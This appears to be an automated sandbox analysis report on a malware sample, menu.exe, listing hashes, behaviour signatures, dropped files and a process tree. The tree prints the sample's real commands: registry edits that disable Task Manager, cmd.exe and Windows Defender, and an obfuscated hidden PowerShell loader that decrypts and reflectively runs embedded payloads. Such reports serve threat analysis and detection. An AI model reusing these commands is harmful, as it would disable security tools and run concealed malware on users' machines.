Overview

overview

10

Static

static

3

menu.exe

windows7-x64

8

menu.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    125s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    18/11/2024, 02:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    menu.exe

  • Size

    309KB

  • MD5

    b7a65ac9cc1f6ac490080b604dca0209

  • SHA1

    40faa498a2e24a65b8ba74fd8123e63e2432f71f

  • SHA256

    061282d0c5d8967e46c0b0739488fbefd996615a9059844274b1cb4df83b52bb

  • SHA512

    fea5efae6766efd76d1b504ea516dd14eef955e84fec12a9035752366b7d36e078064b2088e04bee30ce267baa899a1b87f5a023316e59d4ecba7387a61943ed

  • SSDEEP

    6144:QGXEB3uR4D7P05EkRTwEur5447h/PcHnUSFIT7JHoI0E7YPWs3kZy:QapW/PqbTw3FcHUSFU1v0E7v

Score
8/10
evasionexecution

Malware Config

Signatures

  • Blocks application from running via registry modification 3 IoCs

    Adds application to list of disallowed applications.

    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Disables cmd.exe use via registry modification 1 IoCs
    evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\menu.exe
    "C:\Users\Admin\AppData\Local\Temp\menu.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\load.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2352
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
          3⤵
            PID:2852
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
            3⤵
            • Disables cmd.exe use via registry modification
            PID:2880
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
            3⤵
              PID:2888
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 4 /f
              3⤵
                PID:2848
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v "DisableMSI" /t REG_DWORD /d 1 /f
                3⤵
                  PID:2788
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                  3⤵
                    PID:2736
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
                    3⤵
                    • Blocks application from running via registry modification
                    PID:3012
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f
                    3⤵
                    • Blocks application from running via registry modification
                    PID:2484
                • C:\Windows\system32\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Roaming\loader.bat" "
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2196
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IRcHV6wpyUlV7FCq3bjBVC6HnvFYqZVt3VMM1/rthAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ot9DBajrhd5olnzo/saVIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DyDjK=New-Object System.IO.MemoryStream(,$param_var); $nXYTA=New-Object System.IO.MemoryStream; $riGTr=New-Object System.IO.Compression.GZipStream($DyDjK, [IO.Compression.CompressionMode]::Decompress); $riGTr.CopyTo($nXYTA); $riGTr.Dispose(); $DyDjK.Dispose(); $nXYTA.Dispose(); $nXYTA.ToArray();}function execute_function($param_var,$param2_var){ $dwlZo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UVtXb=$dwlZo.EntryPoint; $UVtXb.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\loader.bat';$InQWi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\loader.bat').Split([Environment]::NewLine);foreach ($XQbNl in $InQWi) { if ($XQbNl.StartsWith(':: ')) { $WcJMs=$XQbNl.Substring(3); break; }}$payloads_var=[string[]]$WcJMs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2872
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ran.vbs"
                  2⤵
                    PID:2236

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\load.bat
                  Filesize

                  1KB

                  MD5

                  cf08811b97cdd3d57685a7841a40e2d4

                  SHA1

                  faefa9b229e81eef5d200799c39b5db5511922d2

                  SHA256

                  7f27ffda0644c500961f965c6f403f54c41c6df7fb685020cf98f7be6fd5082c

                  SHA512

                  695e45bc85be611ca90e92ff5502a707e6ec298f31b6113be2537be78beda222d52751f090b0dda752e2880ac08c62c6d80f4fdd371b2721f1c728d9ebd1002a

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\loader.bat
                  Filesize

                  291KB

                  MD5

                  d05f7937bc9eef5bf3042a8a2ecd2f08

                  SHA1

                  15230c5d5506e80ac6cecd06a21bea1a44aeef08

                  SHA256

                  b981829c3b1026c432c08bc8a65bc1a848750596e01a065bcacef49c128f7226

                  SHA512

                  42954c12e551ff742ab466b416f805d93632cafab1bd2c825b16dcb4f838d7914e61e84cf46744d081d0e6424a3afd335cd169cf8e9c0b6d83733f45eba71c95

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\ran.vbs
                  Filesize

                  4KB

                  MD5

                  be03bd7bd0315142da6482ee8075f97d

                  SHA1

                  44242df82433922b5dae792842d18da1eccac112

                  SHA256

                  f245b406955a4a335f5eb76ef8e48958c55be9e7e667545e95602440c64ee9ae

                  SHA512

                  55230398878d8cbca4b14a93b9e5cae00790f845140f28c9c82c622e7bc53eb4c9875de281eb3ba280478cbecbe56eb6a1720832e9afc6607daeafb83f83e7e9

                  Download Submit

                • memory/2016-0-0x000007FEF5EC3000-0x000007FEF5EC4000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2016-1-0x0000000000FD0000-0x0000000001024000-memory.dmp

                  Filesize

                  336KB

                  Download

                • memory/2872-28-0x000000001B830000-0x000000001BB12000-memory.dmp

                  Filesize

                  2.9MB

                  Download

                • memory/2872-29-0x0000000001E70000-0x0000000001E78000-memory.dmp

                  Filesize

                  32KB

                  Download